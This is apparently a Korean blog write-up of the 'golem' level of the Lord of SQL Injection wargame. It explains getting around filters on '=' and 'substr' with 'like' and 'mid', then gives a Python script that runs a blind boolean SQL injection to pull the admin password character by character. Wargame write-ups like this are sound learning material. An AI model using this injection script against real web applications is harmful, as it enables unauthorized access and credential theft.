Bace
LOS - golem 본문
문제는 다음과 같다.
orge 문제와 똑같지만, 이번에는 =과 substr이 필터링 되어있다.
like를 통해 =을 우회하고, mid를 통해 substr을 우회하였다.
import requests
answer = ''
for i in range(1,9):
for j in range(33,128):
url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=%27%20||%20id like 'admin' %26%26 ascii(mid(pw,{},1))%20like%20{}%20--%20-".format(i,j)
cookies = {'PHPSESSID':'자신의 PHPSESSID'}
response = requests.get(url=url,cookies=cookies)
if response.text.find("Hello admin") != -1:
answer += chr(j)
print 'Found {}st letter'.format(i)
break
print '{}st letter {}th '.format(i,j)
print answer 
solve
'LOS' 카테고리의 다른 글
| LOS - bugbear (0) | 2020.01.21 |
|---|---|
| LOS - darkknight (0) | 2020.01.20 |
| LOS - skeleton (0) | 2020.01.17 |
| LOS - vampire (0) | 2020.01.17 |
| LOS - troll (0) | 2020.01.17 |
'LOS' Related Articles
more
